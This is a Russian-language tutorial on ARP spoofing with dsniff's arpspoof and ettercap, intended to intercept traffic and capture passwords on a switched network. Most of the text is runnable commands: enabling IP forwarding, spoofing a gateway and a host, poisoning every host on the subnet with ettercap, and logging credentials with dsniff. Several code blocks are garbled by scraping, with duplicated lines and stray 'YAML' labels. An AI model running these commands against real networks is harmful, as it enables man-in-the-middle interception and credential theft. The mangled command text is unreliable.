Dsniff – один из наи­бо­лее пол­ных и мощ­ных сво­бод­но рас­про­стра­ня­е­мых набо­ров инстру­мен­тов для пере­хва­та и обра­бот­ки аутен­ти­фи­ка­ци­он­ной информации.

Его функ­ци­о­наль­ность и мно­го­чис­лен­ные ути­ли­ты сде­ла­ли его рас­про­стра­нен­ным инстру­мен­том, исполь­зу­е­мым зло­умыш­лен­ни­ка­ми для пере­хва­та паро­лей и аутен­ти­фи­ка­ци­он­ной инфор­ма­ции из сетей.

Сете­вой ком­му­та­тор не пере­да­ет паке­ты всем в сети так же, как сете­вой кон­цен­тра­тор, и поэто­му тео­ре­ти­че­ски чело­век в сети не может про­смат­ри­вать чужой трафик.

Одна­ко есть спо­со­бы пре­одо­леть эту про­бле­му, кото­рые заклю­ча­ют­ся в выпол­не­нии под­ме­ны arp.

Dsniff

В этой ста­тье мы про­сто обсу­дим, как это дела­ет­ся, без обсуж­де­ния тео­рии, сто­я­щей за этим процессом.

Для нача­ла необ­хо­ди­мо уста­но­вить необ­хо­ди­мую про­грам­му, в дан­ном слу­чае это пакет dsniff, кото­рый содер­жит про­грам­му arpspoof, кото­рая нам нужна.

В Ubuntu или любом дру­гом дис­три­бу­ти­ве на базе Debian он уста­нав­ли­ва­ет­ся с помо­щью коман­ды apt-get, как пока­за­но ниже;

Установка (Ubuntu)

sudo apt-get install dsniff

Включении переадресации IP-адресов

Что­бы убе­дить­ся, что тра­фик пере­на­прав­ля­ет­ся в реаль­ный пункт назна­че­ния, когда он дости­га­ет нашей маши­ны, необ­хо­ди­мо выпол­нить сле­ду­ю­щую команду;

sudo echo 1 > /proc/sys/net/ipv4/ip_forward

Выпол­ним спу­финг ARP

Сле­ду­ю­щая коман­да ска­жет шлю­зу “Я – 192.168.0.100”, а сле­ду­ю­щая коман­да ска­жет 192.168.0.100 “Я – шлюз”.

sudo arpspoof 192.168.0.100 -t 192.168.0.1sudo  arpspoof 192.168.0.1 -t 192.168.0.100

Таким обра­зом, весь тра­фик, кото­рый дол­жен идти на шлюз с маши­ны и наобо­рот, будет сна­ча­ла про­хо­дить через нашу маши­ну, а толь­ко потом направ­лять­ся к реаль­ной цели.

Ettercap

Одна­ко суще­ству­ют про­грам­мы, поз­во­ля­ю­щие упро­стить весь процесс.

Одной из самых попу­ляр­ных про­грамм для это­го явля­ет­ся ettercap.

Ettercap может выпол­нять спу­финг arp, а так­же мно­гое другое.

В Ubuntu пакет назы­ва­ет­ся ettercap-gtk;

Установка (Ubuntu)

YAML$ sudo apt-get install ettercap-gtk1$ sudo apt-get install ettercap-gtk

Запуск спуфинга ARP (графический интерфейс пользователя)

Запуск про­грам­мы с клю­чом -G запу­стит ее в GTK, а не в ncurses.

sudo ettercap -G

В меню выбе­ри­те следующее;

YAMLSniff  Unfied sniffing1Sniff  Unfied sniffing

И в под­сказ­ке выбе­ри­те сете­вой интер­фейс, кото­рый будет использоваться.

Обыч­но это eth0

YAMLNetwork Interface: eth01 Network Interface: eth0

В новом меню выбе­ри­те сле­ду­ю­щее, что­бы доба­вить в спи­сок все хосты в сетиYAMLHosts  Scan for hosts1Hosts  Scan for hosts
Сле­ду­ю­щие дей­ствия выпол­нят под­ме­ну arp для всех в сети.

YAMLMitm  Arp poisoning  OkStart  Start sniffing12Mitm  Arp poisoning OkStart Start sniffing

Выполним спуфинг ARP

Сле­ду­ю­щая коман­да выпол­нит то же самое, что и в при­ме­ре выше, за одну команду;

YAMLsudo ettercap -q -T -M arp // //1sudo ettercap -q -T -M arp // //

Примеры команд dsniff

1. Для мони­то­рин­га сети на нали­чие небез­опас­ных протоколов:

YAML# dsniff -m [-i interface] [-s snap-length] [filter-expression]1# dsniff -m [-i interface] [-s snap-length] [filter-expression]

2. Что­бы сохра­нить резуль­та­ты в базе дан­ных, а не выво­дить их:YAML# dsniff -w gotcha.db [other options…]1# dsniff -w gotcha.db [other options…]

3. Чте­ние и вывод резуль­та­тов из базы данных:YAML# dsniff -r gotcha.db1# dsniff -r gotcha.db